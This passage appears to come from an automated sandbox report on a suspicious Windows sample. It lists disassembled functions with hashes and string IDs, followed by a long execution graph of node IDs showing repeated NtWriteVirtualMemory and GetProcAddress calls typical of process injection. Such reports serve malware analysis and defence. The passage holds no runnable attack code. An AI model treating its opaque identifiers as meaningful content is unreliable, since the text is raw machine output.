                                                                                                    • RTL: Resource at %p, xrefs: 24D272A3
                                                                                                    • RTL: Re-Waiting, xrefs: 24D272C1
                                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 24D27294
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                    • API String ID: 885266447-605551621
                                                                                                    • Opcode ID: f68b28156189b52dee229cd20a4ada08ab1f26b61dd6ba52bc295fcb0508b690
                                                                                                    • Instruction ID: eb7596b8d48f212862e1aa6048e6bb00f0c790b3c8d42f8bc820353b2a6fd2d1
                                                                                                    • Opcode Fuzzy Hash: f68b28156189b52dee229cd20a4ada08ab1f26b61dd6ba52bc295fcb0508b690
                                                                                                    • Instruction Fuzzy Hash: 0041F235700A16ABD721CE29CC41F66B7E6FF54714F10061DF959EB281EB31E8528BE1
                                                                                                    Function 24D62300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___swprintf_l
                                                                                                    • String ID: %%%u$]:%u
                                                                                                    • API String ID: 48624451-3050659472
                                                                                                    • Opcode ID: d7ac431a5492d99cfa648e385fc62c851965cc0d1f26a2059637427e1bfc376f
                                                                                                    • Instruction ID: 30c6bb1b693fa588ce93126a3e2c06eb42accf276d058748f02c02a6e8314bdd
                                                                                                    • Opcode Fuzzy Hash: d7ac431a5492d99cfa648e385fc62c851965cc0d1f26a2059637427e1bfc376f
                                                                                                    • Instruction Fuzzy Hash: 23318472A002299FDB10DE2DDC50BEE77B9FB54610F80459EE949E7244EB30EA448FA1
                                                                                                    Function 24CF7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __aulldvrm
                                                                                                    • String ID: +$-
                                                                                                    • API String ID: 1302938615-2137968064
                                                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                    • Instruction ID: 7d277ad4833f9e239383612cfd2f86501565974ebf456ec594ce9a516ad63b2e
                                                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                    • Instruction Fuzzy Hash: 8F91C670E01A069FDB94CF6DCC80AAEBBA3FF44720F62452BE955E72C5D73889418720
                                                                                                    Function 24CB9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $$@
                                                                                                    • API String ID: 0-1194432280
                                                                                                    • Opcode ID: 63423346da27cfc3b8e8f3338ebfcf02826cce1033e128aa658ec0b9537b3bc5
                                                                                                    • Instruction ID: 87c4b448fae5053dfb6d6226f1e4ad6b3fc579ffe5b39ecfaa2699927f1e5c31
                                                                                                    • Opcode Fuzzy Hash: 63423346da27cfc3b8e8f3338ebfcf02826cce1033e128aa658ec0b9537b3bc5
                                                                                                    • Instruction Fuzzy Hash: 82811A76D012699BDB25CB54CC44BEEB7B9AF08750F0041DAEA5DB7290D7315E84CFA0

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:9.2%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:1473
                                                                                                    Total number of Limit Nodes:13
                                                                                                    execution_graph 24993 2acbb3c 24996 2abec6c 24993->24996 24995 2acbb44 24997 2abec74 24996->24997 24997->24997 26442 2ab8704 24997->26442 24999 2abec96 25000 2abec9b 24999->25000 25001 2abed20 25000->25001 26448 2ab881c 25001->26448 25003 2abed33 25004 2abed84 25003->25004 25005 2ab881c 3 API calls 25004->25005 25006 2abed97 25005->25006 25007 2abede8 25006->25007 25008 2abedf2 25007->25008 25009 2ab881c 3 API calls 25008->25009 25010 2abedfb 25009->25010 25011 2abee56 25010->25011 25012 2ab881c 3 API calls 25011->25012 25013 2abee5f 25012->25013 25014 2abeeba 25013->25014 25015 2ab881c 3 API calls 25014->25015 25016 2abeec3 25015->25016 25017 2abeee1 25016->25017 25018 2abef1e 25017->25018 25019 2ab881c 3 API calls 25018->25019 25020 2abef27 25019->25020 25021 2abef45 25020->25021 25022 2ab881c 3 API calls 25021->25022 25023 2abef8b 25022->25023 25024 2abef90 25023->25024 25025 2abef98 25024->25025 25026 2acaa1b 25024->25026 26452 2abebe8 25025->26452 25028 2abef9d 25028->25026 25029 2ab881c 3 API calls 25028->25029 25030 2abefcc 25029->25030 25031 2abefea 25030->25031 25032 2ab881c 3 API calls 25031->25032 25033 2abeff3 25032->25033 25034 2ab881c 3 API calls 25033->25034 25035 2abf026 25034->25035 25036 2abf05f 25035->25036 25037 2abf096 25036->25037 25038 2ab881c 3 API calls 25037->25038 25039 2abf0a2 25038->25039 25040 2ab881c 3 API calls 25039->25040 25041 2abf0d5 25040->25041 25042 2ab881c 3 API calls 25041->25042 25043 2abf108 25042->25043 25044 2ab881c 3 API calls 25043->25044 25045 2abf13b 25044->25045 25046 2abf15c 25045->25046 25047 2abf174 25046->25047 25048 2abf19e 25047->25048 25049 2ab881c 3 API calls 25048->25049 25050 2abf1b7 25049->25050 25051 2abf1f0 25050->25051 25052 2abf20f 25051->25052 25053 2abf21a 25052->25053 25054 2ab881c 3 API calls 25053->25054 25055 2abf233 25054->25055 25056 2ab881c 3 API calls 25055->25056 25057 2abf266 25056->25057 25058 2abf276 25057->25058 25059 2ab881c 3 API calls 25058->25059 25060 2abf299 25059->25060 25061 2ab881c 3 API calls 25060->25061 25062 2abf2cc 25061->25062 25063 2abf2f8 25062->25063 25064 2abf324 25063->25064 25065 2ab881c 3 API calls 25064->25065 25066 2abf348 25065->25066 25067 2ab881c 3 API calls 25066->25067 25068 2abf37b 25067->25068 25069 2abf3a2 25068->25069 25070 2ab881c 3 API calls 25069->25070 25071 2abf3ae 25070->25071 25072 2ab881c 3 API calls 25071->25072 25073 2abf3e1 25072->25073 25074 2abf402 25073->25074 25075 2abf40d 25074->25075 25076 2abf41a 25075->25076 25077 2ab881c 3 API calls 25076->25077 25078 2abf45d 25077->25078 25079 2abf489 25078->25079 25080 2abf4c0 25079->25080 25081 2ab881c 3 API calls 25080->25081 25082 2abf4d9 25081->25082 25083 2abf500 25082->25083 25084 2ab881c 3 API calls 25083->25084 25085 2abf50c 25084->25085 25086 2abf533 25085->25086 25087 2ab881c 3 API calls 25086->25087 25088 2abf53f 25087->25088 25089 2ab881c 3 API calls 25088->25089 25090 2abf572 25089->25090 25091 2abf5ab 25090->25091 25092 2ab881c 3 API calls 25091->25092 25093 2abf5ee 25092->25093 25094 2abf627 25093->25094 25095 2ab881c 3 API calls 25094->25095 25096 2abf66a 25095->25096 25097 2abf68b 25096->25097 25098 2abf6a3 25097->25098 25099 2ab881c 3 API calls 25098->25099 25100 2abf6e6 25099->25100 25101 2abf707 25100->25101 25102 2abf71f 25101->25102 25103 2ab881c 3 API calls 25102->25103 25104 2abf762 25103->25104 25105 2abf771 25104->25105 25106 2abf79b 25105->25106 25107 2abf7d7 25106->25107 25108 2abf803 25107->25108 25109 2abf81b 25108->25109 25110 2ab881c 3 API calls 25109->25110 25111 2abf827 25110->25111 25112 2abf848 25111->25112 25113 2abf853 25112->25113 25114 2abf87f 25113->25114 25115 2abf897 25114->25115 25116 2ab881c 3 API calls 25115->25116 25117 2abf8a3 25116->25117 25118 2abf8c4 25117->25118 25119 2abf9d9 25118->25119 25120 2abf8cc 25118->25120 25122 2abfa05 25119->25122 25121 2abf8ed 25120->25121 25123 2abf924 25121->25123 25124 2abfa31 25122->25124 25126 2ab881c 3 API calls 25123->25126 25125 2ab881c 3 API calls 25124->25125 25127 2abfa55 25125->25127 25128 2abf948 25126->25128 25130 2abfaad 25127->25130 25129 2abf9a0 25128->25129 25132 2ab881c 3 API calls 25129->25132 25131 2ab881c 3 API calls 25130->25131 25133 2abf9c4 25131->25133 25132->25133 25134 2abfb12 25133->25134 25135 2abfb2a 25134->25135 25136 2abfb49 25135->25136 25137 2ab881c 3 API calls 25136->25137 25138 2abfb6d 25137->25138 25139 2abfba6 25138->25139 25140 2abfbc5 25139->25140 25141 2abfbd0 25140->25141 25142 2ab881c 3 API calls 25141->25142 25143 2abfbe9 25142->25143 25144 2abfc20 25143->25144 25145 2abfc39 25144->25145 25146 2abfc5a 25145->25146 25147 2abfc72 25146->25147 25148 2ab881c 3 API calls 25147->25148 25149 2abfcb5 25148->25149 25150 2abfcd6 25149->25150 25151 2abfce1 25150->25151 25152 2abfcee 25151->25152 25153 2ab881c 3 API calls 25152->25153 25154 2abfd31 25153->25154 25155 2abfd5d 25154->25155 25156 2abfd6a 25155->25156 25157 2ab881c 3 API calls 25156->25157 25158 2abfdad 25157->25158 25159 2abfdd9 25158->25159 25160 2abfde6 25159->25160 25161 2ab881c 3 API calls 25160->25161 25162 2abfe29 25161->25162 25163 2abfe49 25162->25163 25164 2abfe75 25163->25164 25165 2abfea1 25164->25165 25166 2ab881c 3 API calls 25165->25166 25167 2abfec5 25166->25167 25168 2abfee6 25167->25168 25169 2abfefe 25168->25169 25170 2abff1d 25169->25170 25171 2abff28 25170->25171 25172 2ab881c 3 API calls 25171->25172 25173 2abff41 25172->25173 25174 2abff62 25173->25174 25175 2abff7a 25174->25175 25176 2abff99 25175->25176 25177 2abffa4 25176->25177 25178 2ab881c 3 API calls 25177->25178 25179 2abffbd 25178->25179 25180 2abffc7 25179->25180 25181 2abffdf 25180->25181 25182 2abffe7 25181->25182 25183 2ac07a3 25181->25183 25184 2ac0008 25182->25184 25186 2ac07cf 25183->25186 25185 2ac0013 25184->25185 25189 2ac0020 25185->25189 25187 2ac0806 25186->25187 25188 2ac0813 25187->25188 25190 2ab881c 3 API calls 25188->25190 25191 2ab881c 3 API calls 25189->25191 25192 2ac081f 25190->25192 25193 2ac0063 25191->25193 25195 2ac084b 25192->25195 25194 2ac0084 25193->25194 25196 2ac008f 25194->25196 25198 2ac0858 25195->25198 25197 2ac009c 25196->25197 25200 2ac00bb 25197->25200 25199 2ac0882 25198->25199 25201 2ac088f 25199->25201 25203 2ab881c 3 API calls 25200->25203 25202 2ab881c 3 API calls 25201->25202 25204 2ac089b 25202->25204 25205 2ac00df 25203->25205 25207 2ac08c7 25204->25207 25206 2ac0100 25205->25206 25208 2ac010b 25206->25208 25209 2ac08d4 25207->25209 25210 2ac0118 25208->25210 25211 2ac08f3 25209->25211 25212 2ac0137 25210->25212 25214 2ac090b 25211->25214 25213 2ac0142 25212->25213 25215 2ab881c 3 API calls 25213->25215 25216 2ab881c 3 API calls 25214->25216 25218 2ac015b 25215->25218 25217 2ac0917 25216->25217 25219 2ac0939 25217->25219 25220 2ac016c 25218->25220 25221 2ac0949 25219->25221 25222 2ac018d 25220->25222 25224 2ac096a 25221->25224 25223 2ac01b9 25222->25223 25227 2ac01e5 25223->25227 25225 2ac09ac 25224->25225 25226 2ac09b9 25225->25226 25229 2ab881c 3 API calls 25226->25229 25228 2ac01fd 25227->25228 25230 2ab881c 3 API calls 25228->25230 25231 2ac09c5 25229->25231 25232 2ac0209 25230->25232 25233 2ac09e6 25231->25233 25234 2ac0235 25232->25234 25236 2ac09f1 25233->25236 25235 2ac0261 25234->25235 25237 2ac0279 25235->25237 25238 2ac0a35 25236->25238 25240 2ab881c 3 API calls 25237->25240 25239 2ab881c 3 API calls 25238->25239 25241 2ac0a41 25239->25241 25242 2ac0285 25240->25242 25243 2ac0a62 25241->25243 25245 2ac02b1 25242->25245 25244 2ac0a6d 25243->25244 25246 2ac0a7a 25244->25246 25247 2ac02dd 25245->25247 25248 2ac0ab1 25246->25248 25249 2ac02f5 25247->25249 25251 2ab881c 3 API calls 25248->25251 25250 2ab881c 3 API calls 25249->25250 25253 2ac0301 25250->25253 25252 2ac0abd 25251->25252 25256 2ac0ad2 25252->25256 25254 2ac0316 25253->25254 25255 2ac0329 25254->25255 25257 2ac034a 25255->25257 25258 2ac0b06 25256->25258 25259 2ac0355 25257->25259 25261 2ac0b1e 25258->25261 25260 2ac0381 25259->25260 25263 2ac0399 25260->25263 25262 2ac0b48 25261->25262 25264 2ab881c 3 API calls 25262->25264 25265 2ab881c 3 API calls 25263->25265 25266 2ac0b61 25264->25266 25267 2ac03a5 25265->25267 25269 2ac0b82 25266->25269 25268 2ac03c6 25267->25268 25270 2ac03d1 25268->25270 25271 2ac0b9a 25269->25271 25272 2ac03de 25270->25272 25275 2ac0bc4 25271->25275 25273 2ac03fd 25272->25273 25274 2ac0415 25273->25274 25276 2ab881c 3 API calls 25274->25276 25277 2ab881c 3 API calls 25275->25277 25279 2ac0421 25276->25279 25278 2ac0bdd 25277->25278 25282 2ac0bfe 25278->25282 25280 2ac0430 25279->25280 25281 2ac043a 25280->25281 25283 2ac079e 25281->25283 25284 2ac0442 25281->25284 25286 2ac0c16 25282->25286 25290 2ac1fa9 25283->25290 25285 2ac0463 25284->25285 25288 2ac046e 25285->25288 25287 2ac0c40 25286->25287 25289 2ab881c 3 API calls 25287->25289 25295 2ac04a5 25288->25295 25291 2ac0c59 25289->25291 25294 2ac1fed 25290->25294 25292 2ac0c68 25291->25292 25293 2ac0c77 25292->25293 25300 2ac0c98 25293->25300 25296 2ab881c 3 API calls 25294->25296 25297 2ab881c 3 API calls 25295->25297 25298 2ac1ff9 25296->25298 25299 2ac04be 25297->25299 25305 2ac201a 25298->25305 25302 2ac04ea 25299->25302 25301 2ac0cb0 25300->25301 25303 2ac0cda 25301->25303 25306 2ac0516 25302->25306 25304 2ac0ce7 25303->25304 25309 2ab881c 3 API calls 25304->25309 25307 2ac2069 25305->25307 25308 2ac052e 25306->25308 25311 2ab881c 3 API calls 25307->25311 25312 2ab881c 3 API calls 25308->25312 25310 2ac0cf3 25309->25310 25315 2ac0d14 25310->25315 25313 2ac2075 25311->25313 25314 2ac053a 25312->25314 25316 2ac2096 25313->25316 25319 2ac0566 25314->25319 25317 2ac0d1f 25315->25317 25321 2ac20a1 25316->25321 25318 2ac0d2c 25317->25318 25323 2ac0d56 25318->25323 25320 2ac0592 25319->25320 25322 2ac05aa 25320->25322 25324 2ac20e5 25321->25324 25327 2ab881c 3 API calls 25322->25327 25325 2ab881c 3 API calls 25323->25325 25326 2ab881c 3 API calls 25324->25326 25328 2ac0d6f 25325->25328 25331 2ac20f1 25326->25331 25329 2ac05b6 25327->25329 25330 2ac0d79 25328->25330 25333 2ac05e2 25329->25333 25330->25283 25335 2ac0d81 25330->25335 25332 2ac211d 25331->25332 25334 2ac2149 25332->25334 25338 2ac060e 25333->25338 25337 2ac2154 25334->25337 25336 2ac0dd9 25335->25336 25341 2ac0df1 25336->25341 25342 2ab881c 3 API calls 25337->25342 25339 2ac0626 25338->25339 25340 2ab881c 3 API calls 25339->25340 25344 2ac0632 25340->25344 25346 2ab881c 3 API calls 25341->25346 25343 2ac216d 25342->25343 25343->25026 25348 2ac2192 25343->25348 25345 2ac0653 25344->25345 25347 2ac065e 25345->25347 25351 2ac0dfd 25346->25351 25349 2ac066b 25347->25349 26456 2aa46a4 25348->26456 25354 2ac068a 25349->25354 25353 2ac0e55 25351->25353 25352 2ac21cb 25355 2ac21ea 25352->25355 25357 2ac0e6d 25353->25357 25356 2ac06a2 25354->25356 25359 2ac2202 25355->25359 25358 2ab881c 3 API calls 25356->25358 25363 2ab881c 3 API calls 25357->25363 25360 2ac06ae 25358->25360 25361 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25359->25361 25362 2ac06b8 25360->25362 25365 2ac220e 25361->25365 25364 2ac06c5 25362->25364 25367 2ac0e79 25363->25367 25366 2ac06d6 25364->25366 25370 2ac2247 25365->25370 25368 2ac06e6 25366->25368 25372 2ac0ec6 25367->25372 25369 2ac0743 25368->25369 25371 2ac074e 25369->25371 25373 2ac227e 25370->25373 25376 2ac077a 25371->25376 25375 2ac0ede 25372->25375 25374 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25373->25374 25377 2ac228a 25374->25377 25379 2ac0f15 25375->25379 25378 2ac0792 25376->25378 25384 2ac22c3 25377->25384 25381 2ab881c 3 API calls 25378->25381 25380 2ab881c 3 API calls 25379->25380 25382 2ac0f21 25380->25382 25381->25283 25383 2ac0f4d 25382->25383 25385 2ac0f5a 25383->25385 25386 2ac22fa 25384->25386 25388 2ac0f79 25385->25388 25387 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25386->25387 25389 2ac2306 25387->25389 25391 2ac0f91 25388->25391 25390 2ac2327 25389->25390 25392 2ac2332 25390->25392 25393 2ab881c 3 API calls 25391->25393 25395 2ac235e 25392->25395 25394 2ac0f9d 25393->25394 25396 2ac0fc9 25394->25396 25397 2ac2369 25395->25397 25398 2ac0fd6 25396->25398 25399 2ac2376 25397->25399 25401 2ac0ff5 25398->25401 25400 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25399->25400 25402 2ac2382 25400->25402 25404 2ac100d 25401->25404 25403 2ac238c 25402->25403 25407 2ac239e 25403->25407 25405 2ab881c 3 API calls 25404->25405 25406 2ac1019 25405->25406 25408 2ac103a 25406->25408 25410 2ac23cf 25407->25410 25409 2ac1052 25408->25409 25411 2ac1071 25409->25411 25412 2ac23e7 25410->25412 25413 2ac1089 25411->25413 25414 2ac241e 25412->25414 25415 2ab881c 3 API calls 25413->25415 25416 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25414->25416 25417 2ac1095 25415->25417 25418 2ac242a 25416->25418 25421 2ac10b6 25417->25421 25419 2ac244b 25418->25419 25420 2ac2456 25419->25420 25423 2ac2463 25420->25423 25422 2ac10f8 25421->25422 25425 2ac1105 25422->25425 25424 2ac248d 25423->25424 25426 2ac249a 25424->25426 25427 2ab881c 3 API calls 25425->25427 25428 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25426->25428 25429 2ac1111 25427->25429 25430 2ac24a6 25428->25430 25431 2ac1126 25429->25431 25432 2ac24b6 25430->25432 25434 2ac113c 25431->25434 25433 2ac24c6 25432->25433 25438 2ac24e7 25433->25438 25435 2ac1194 25434->25435 25436 2ac119f 25435->25436 25437 2ac11ac 25436->25437 25440 2ab881c 3 API calls 25437->25440 25439 2ac2536 25438->25439 25441 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25439->25441 25442 2ac11b8 25440->25442 25443 2ac2542 25441->25443 25445 2ac11d9 25442->25445 25444 2ac2563 25443->25444 25447 2ac256e 25444->25447 25446 2ac1210 25445->25446 25448 2ac1228 25446->25448 25449 2ac25b2 25447->25449 25450 2ab881c 3 API calls 25448->25450 25451 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25449->25451 25452 2ac1234 25450->25452 25453 2ac25be 25451->25453 25455 2ac1255 25452->25455 25454 2ac25df 25453->25454 25458 2ac25ea 25454->25458 25456 2ac126d 25455->25456 25457 2ac1297 25456->25457 25460 2ab881c 3 API calls 25457->25460 25459 2ac262e 25458->25459 25461 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25459->25461 25462 2ac12b0 25460->25462 25463 2ac263a 25461->25463 25678 2ac12ba 25462->25678 25464 2ac264b 25463->25464 25465 2ac2661 25464->25465 25466 2ac2674 25465->25466 25467 2ac2695 25466->25467 25468 2ac26a0 25467->25468 25469 2ac26ad 25468->25469 25471 2ac26cc 25469->25471 25470 2ab881c 3 API calls 25473 2ac1336 25470->25473 25472 2ac26d7 25471->25472 25474 2ac26e4 25472->25474 25478 2ac1362 25473->25478 25475 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25474->25475 25476 2ac26f0 25475->25476 25477 2ac2711 25476->25477 25479 2ac271c 25477->25479 25480 2ac1399 25478->25480 25481 2ac2729 25479->25481 25482 2ac13a6 25480->25482 25486 2ac2748 25481->25486 25483 2ab881c 3 API calls 25482->25483 25484 2ac13b2 25483->25484 25485 2ac13cb 25484->25485 25488 2ac13ec 25485->25488 25487 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25486->25487 25490 2ac276c 25487->25490 25489 2ac1423 25488->25489 25491 2ac142e 25489->25491 25495 2ac27c4 25490->25495 25492 2ac143b 25491->25492 25493 2ab881c 3 API calls 25492->25493 25494 2ac1447 25493->25494 25497 2ac1473 25494->25497 25496 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25495->25496 25499 2ac27e8 25496->25499 25498 2ac1480 25497->25498 25500 2ac149f 25498->25500 25502 2ac2821 25499->25502 25501 2ac14aa 25500->25501 25503 2ab881c 3 API calls 25501->25503 25506 2ac2858 25502->25506 25504 2ac14c3 25503->25504 26458 2abe2f0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25504->26458 25508 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25506->25508 25507 2ac14cd 25507->25283 25509 2ac14d5 25507->25509 25528 2ac15e4 25507->25528 25507->25678 25510 2ac2864 25508->25510 25511 2ac14f6 25509->25511 25512 2ac2882 25510->25512 25513 2ac152d 25511->25513 25517 2ac28af 25512->25517 25514 2ac1538 25513->25514 25515 2ac1545 25514->25515 25516 2ab881c 3 API calls 25515->25516 25518 2ac1551 25516->25518 25521 2ac28dc 25517->25521 25519 2ac157d 25518->25519 25520 2ac158a 25519->25520 25522 2ac15a9 25520->25522 25525 2ac2909 25521->25525 25523 2ac15b4 25522->25523 25524 2ab881c 3 API calls 25523->25524 25676 2ac15cd 25524->25676 25526 2ac298a 25525->25526 25527 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25526->25527 25531 2ac29a3 25527->25531 25529 2ac1647 25528->25529 25530 2ab881c 3 API calls 25529->25530 25534 2ac1660 25530->25534 25532 2ac2a06 25531->25532 25533 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25532->25533 25537 2ac2a1f 25533->25537 25535 2ac16c3 25534->25535 25536 2ab881c 3 API calls 25535->25536 25541 2ac16dc 25536->25541 25538 2ac2a49 25537->25538 25573 2ac2bbd 25537->25573 25540 2ac2a75 25538->25540 25539 2ac2c0b 25543 2ac2c42 25539->25543 25544 2ac2aac 25540->25544 25542 2ac173b 25541->25542 25549 2ac1753 25542->25549 25545 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25543->25545 25546 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25544->25546 25548 2ac2c5b 25545->25548 25552 2ac2ac5 25546->25552 25547 2ab881c 3 API calls 25547->25549 25550 2ac2c7c 25548->25550 25549->25547 25551 2ac178b 25549->25551 25554 2ac2cb3 25550->25554 25553 2ac17c2 25551->25553 25556 2ac2b28 25552->25556 25555 2ac17cf 25553->25555 25557 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25554->25557 25559 2ab881c 3 API calls 25555->25559 25558 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25556->25558 25562 2ac2cd7 25557->25562 25563 2ac2b41 25558->25563 25560 2ac17db 25559->25560 25561 2ac17fb 25560->25561 25564 2ac181c 25561->25564 25565 2ac2d2b 25562->25565 25568 2ac2ba4 25563->25568 25566 2ac1834 25564->25566 25570 2ac2d62 25565->25570 25567 2ac1853 25566->25567 25571 2ac185e 25567->25571 25569 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25568->25569 25569->25573 25572 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25570->25572 25574 2ab881c 3 API calls 25571->25574 25577 2ac2d86 25572->25577 25573->25539 25575 2ac1877 25574->25575 25576 2ac1898 25575->25576 25578 2ac18a3 25576->25578 25580 2ac2dbf 25577->25580 25579 2ac18cf 25578->25579 25581 2ac18da 25579->25581 25582 2ac2df6 25580->25582 25584 2ab881c 3 API calls 25581->25584 25583 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25582->25583 25587 2ac2e02 25583->25587 25585 2ac18f3 25584->25585 25586 2ac1910 25585->25586 25590 2ac1934 25586->25590 25588 2ac2e2e 25587->25588 25589 2ac2e65 25588->25589 25592 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25589->25592 25591 2ac1976 25590->25591 25594 2ac1983 25591->25594 25593 2ac2e7e 25592->25593 25598 2ac2e9f 25593->25598 25595 2ab881c 3 API calls 25594->25595 25596 2ac198f 25595->25596 25597 2ac19b0 25596->25597 25600 2ac19bb 25597->25600 25599 2ac2ed6 25598->25599 25601 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25599->25601 25602 2ac19ff 25600->25602 25603 2ac2efa 25601->25603 25604 2ab881c 3 API calls 25602->25604 25605 2ac2f0f 25603->25605 26373 2ac4c65 25603->26373 25606 2ac1a0b 25604->25606 25611 2ac2f30 25605->25611 25607 2ac1a1c 25606->25607 25608 2ac1a40 25607->25608 25610 2ac1a4b 25608->25610 25609 2ac4c9c 25612 2ac4cd3 25609->25612 25616 2ac1a82 25610->25616 25614 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25611->25614 25613 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25612->25613 25615 2ac4cec 25613->25615 25617 2ac2f8b 25614->25617 25620 2ac4d0d 25615->25620 25618 2ab881c 3 API calls 25616->25618 25623 2ac2fac 25617->25623 25619 2ac1a9b 25618->25619 25621 2ac1ac7 25619->25621 25622 2ac4d44 25620->25622 25625 2ac1af3 25621->25625 25624 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25622->25624 25626 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25623->25626 25627 2ac4d68 25624->25627 25630 2ac1b0b 25625->25630 25628 2ac3007 25626->25628 25634 2ac4d94 25627->25634 25633 2ac3028 25628->25633 25629 2ab881c 3 API calls 25629->25630 25630->25629 25631 2ac1b40 25630->25631 25632 2ac1b6c 25631->25632 25639 2ac1b98 25632->25639 25636 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25633->25636 25635 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25634->25635 25637 2ac4de4 25635->25637 25638 2ac3083 25636->25638 25643 2ac4e10 25637->25643 25642 2ac30a4 25638->25642 25640 2ab881c 3 API calls 25639->25640 25641 2ac1bbc 25640->25641 25644 2ac1be8 25641->25644 25646 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25642->25646 25645 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25643->25645 25648 2ac1c14 25644->25648 25647 2ac4e60 25645->25647 25649 2ac30ff 25646->25649 25658 2ac4e86 25647->25658 25650 2ac1c2c 25648->25650 25654 2ac3120 25649->25654 25651 2ab881c 3 API calls 25650->25651 25652 2ac1c38 25651->25652 25653 2ac1c3d 25652->25653 25655 2ac1c5e 25653->25655 25656 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25654->25656 25657 2ac1c76 25655->25657 25661 2ac317b 25656->25661 25660 2ac1ca0 25657->25660 25659 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25658->25659 25669 2ac4f02 25659->25669 25662 2ac1cad 25660->25662 25665 2ac31c5 25661->25665 25663 2ab881c 3 API calls 25662->25663 25664 2ac1cb9 25663->25664 25666 2ac1cda 25664->25666 25670 2ac3229 25665->25670 25667 2ac1ce5 25666->25667 25668 2ac1cf2 25667->25668 25674 2ac1d1c 25668->25674 25671 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25669->25671 25672 2ac3241 25670->25672 25684 2ac4f7e 25671->25684 25673 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25672->25673 25677 2ac324d 25673->25677 25675 2ab881c 3 API calls 25674->25675 25675->25676 25676->25507 25680 2ac32a5 25677->25680 25679 2ac12f3 25678->25679 25683 2ac1312 25679->25683 25681 2ac32bd 25680->25681 25682 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25681->25682 25688 2ac32c9 25682->25688 25683->25470 25686 2ab881c 3 API calls 25683->25686 25685 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25684->25685 25695 2ac5026 25685->25695 25687 2ac1dd6 25686->25687 25690 2ac1e02 